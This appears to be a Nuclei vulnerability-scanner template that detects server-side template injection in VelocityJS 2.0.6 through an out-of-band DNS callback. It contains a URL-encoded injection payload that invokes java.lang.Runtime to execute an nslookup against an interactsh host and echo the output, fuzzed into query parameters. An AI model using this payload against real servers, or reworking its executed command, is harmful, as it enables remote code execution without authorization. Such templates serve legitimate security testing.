id: velocityjs-oob
info:
name: VelocityJS 2.0.6 - Out of Band Template Injection
author: 0xAwali,DhiyaneshDK
severity: high
reference:
- https://www.npmjs.com/package/velocityjs
- https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
metadata:
verified: true
tags: ssti,dast,oast,oob,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- '%23set%28%24var%3D%27%27%29%23%23%0A%23set%28%24runtime%3D%24var.class.forName%28%27java.lang.Runtime%27%29%29%23%23%0A%23set%28%24character%3D%24var.class.forName%28%27java.lang.Character%27%29%29%23%23%0A%23set%28%24string%3D%24var.class.forName%28%27java.lang.String%27%29%29%23%23%0A%23set%28%24rce%3D%24runtime.getRuntime%28%29.exec%28%27nslookup%20-type%3DSRV%20{{interactsh-url}}%27%29%29%23%23%0A%24rce.waitFor%28%29%0A%23set%28%24output%3D%24rce.getInputStream%28%29%29%23%23%0A%23foreach%28%24i%20in%20%5B1..%24output.available%28%29%5D%29%24string.valueOf%28%24character.toChars%28%24output.read%28%29%29%29%23end'
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{injection}}"
matchers:
- type: dsl
name: request-matcher
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(interactsh_request,'srv')"
condition: and
# digest: 4a0a0047304502204f6955471e5585c3b45d089e39d4a2c56782d388b3fc036370056392dfc2ce14022100d304d34c7c47d1ca29fff41a527a76abbbc1d5ed54680a26691e810bd7e82e91:922c64590222798bb761d5b6d8e72950